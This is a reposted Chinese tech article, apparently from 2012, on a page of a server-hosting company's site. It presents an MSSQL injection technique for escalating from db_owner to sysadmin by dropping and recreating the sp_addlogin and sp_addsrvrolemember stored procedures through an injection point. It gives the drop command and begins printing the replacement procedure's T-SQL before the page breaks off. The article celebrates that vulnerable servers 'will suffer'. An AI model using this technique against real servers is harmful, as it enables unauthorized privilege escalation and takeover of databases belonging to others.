SQL注入攻击通杀

作者佚名技术来源数据库编程浏览发布时间 2012-03-20

MSSQL注入通杀，只要有注入点就有系统权限
　　不知道大家看过这篇文章没有，可以在db_owner角色下添加SYSADMIN帐号，这招真狠啊，存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程，饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin
　　@loginame sysname
　　,@passwd sysname = Null
　　,@defdb ; ; sysname = ’master’ -- UNDONE: DEFAULT
　　CONFIGURABLE???
　　,@deflanguage sysname = Null
　　,@sid varbinary(16) = Null
　　,@encryptopt varchar(20) = Null
　　AS
　　-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
　　set nocount on
　　Declare @ret int -- return value of sp call
　　-- DISALLOW USER TRANSACTION --
　　set implicit_transactions off
　　IF (@@trancount > 0)
　　begin
　　raiserror(15002,-1,-1,’sp_addlogin’)
　　return (1)
　　end
　　-- VALIDATE LOGIN NAME AS:
　　-- (1) Valid SQL Name (SQL LOGIN)
　　-- (2) No backslash (NT users only)
　　-- (3) Not a reserved login name
　　execute @ret = sp_validname @loginame
　　if (@ret <> 0)
　　return (1)
　　if (charindex(’\’, @loginame) > 0)
　　begin
　　raiserror(15006,-1,-1,@loginame)
　　return (1)
　　end
　　--Note: different case sa is allowed.
　　if (@loginame = ’sa’ or lower(@loginame) in (’public’))
　　begin
　　raiserror(15405, -1 ,-1, @loginame)
　　return (1)
　　end
　　-- LOGIN NAME MUST NOT ALREADY EXIST --
　　if exists(select * from master.dbo.syslogins where loginname =
　　@loginame)
　　begin
　　raiserror(15025,-1,-1,@loginame)
　　return (1)
　　end
　　-- VALIDATE DEFAULT DATABASE --
　　IF db_id(@defdb) IS NULL
　　begin
　　raiserror(15010,-1,-1,@defdb)
　　return (1)
　　end
　　-- VALIDATE DEFAULT LANGUAGE --
　　IF (@deflanguage IS NOT Null)
　　begin
　　Execute @ret = sp_validlang @deflanguage
　　IF (@ret <> 0)
　　return (1)
　　end
　　ELSE
　　begin
　　select @deflanguage = name from master.dbo.syslanguages
　　where langid = @@default_langid --server default
　　language
　　if @deflanguage is null
　　select @deflanguage = N’us_english’
　　end
　　-- VALIDATE SID IF GIVEN --
　　if ((@sid IS

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!

1 2 下一页

分享到：更多

你可能对下面的文章感兴趣

上一篇: 让数据库产生一张详细的日历表下一篇: 关于SQL Server 2000的安全配置

关于SQL注入攻击通杀的所有评论

随机推荐